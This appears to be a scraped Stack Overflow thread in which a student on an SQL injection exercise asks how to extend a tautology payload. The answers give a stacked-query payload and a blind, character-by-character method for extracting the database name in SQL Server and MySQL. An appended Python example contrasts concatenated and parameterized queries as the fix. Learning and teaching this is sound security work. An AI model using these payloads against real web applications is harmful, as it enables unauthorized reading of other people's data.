SQL Injection - MYSQL

只谈情不闲聊 submitted on 2019-12-11 01:28:33

Question


I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:

select * from contacts where name = ''

I managed to see the users in the table using this:

select * from contacts where name = 'anything' or 1='1'

But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.

EDIT:

To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.

So imagine the query is being this:

select * from contacts where name = ''

And I wrote this to the text field, to see all the users.

anything' or 1='1

I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.

Thank you.


Answer 1:


So if the query is :

select * from contacts where name = ''

You can try something like:

'; select * from anotherTableName'



Answer 2:


If your data does not return multi-result sets then you can do something like:

In SQL Server

SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...

Until you get all the correct indexes of the characters in the name.

In MySQL it would be something like:

SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...


Source: https://stackoverflow.com/questions/47837400/sql-injection-mysql
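
Why the text field in the question can rewrite the query, and the fix, as an added example that is not part of the original question or answers: the same lookup built by string concatenation and with a bound parameter. Assumptions: Python's sqlite3 stands in for MySQL so it runs offline, the table rows and function names are constructed, and the tautology is written as '1'='1 because SQLite does not coerce 1 and '1' to equal values the way MySQL does.

```python
import sqlite3

def make_db():
    # Constructed sample data; an in-memory SQLite database stands in for MySQL.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO contacts (name) VALUES (?)",
                     [("alice",), ("bob",), ("carol",)])
    return conn

def lookup_concatenated(conn, name):
    # Vulnerable pattern from the question: the text field's value is pasted
    # between the quotes, so a quote in the value ends the string literal and
    # the rest is parsed as SQL.
    query = "select * from contacts where name = '" + name + "'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, name):
    # Hardened form: the statement text is fixed and the value is bound as
    # data, so quotes and semicolons in it are only characters of a name.
    return conn.execute("select * from contacts where name = ?",
                        (name,)).fetchall()

def compare(conn, value):
    # Row counts returned by (concatenated, parameterized) for the same input.
    return (len(lookup_concatenated(conn, value)),
            len(lookup_parameterized(conn, value)))

if __name__ == "__main__":
    conn = make_db()
    for value in ("alice", "anything' or '1'='1"):
        print(repr(value), compare(conn, value))
    # The string from Answer 1 is also just a non-matching name when bound.
    print(lookup_parameterized(conn, "'; select * from anotherTableName'"))
```

With MySQL the same fix is a prepared statement or the driver's parameter binding; the application account should also hold only the privileges the contact lookup needs.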
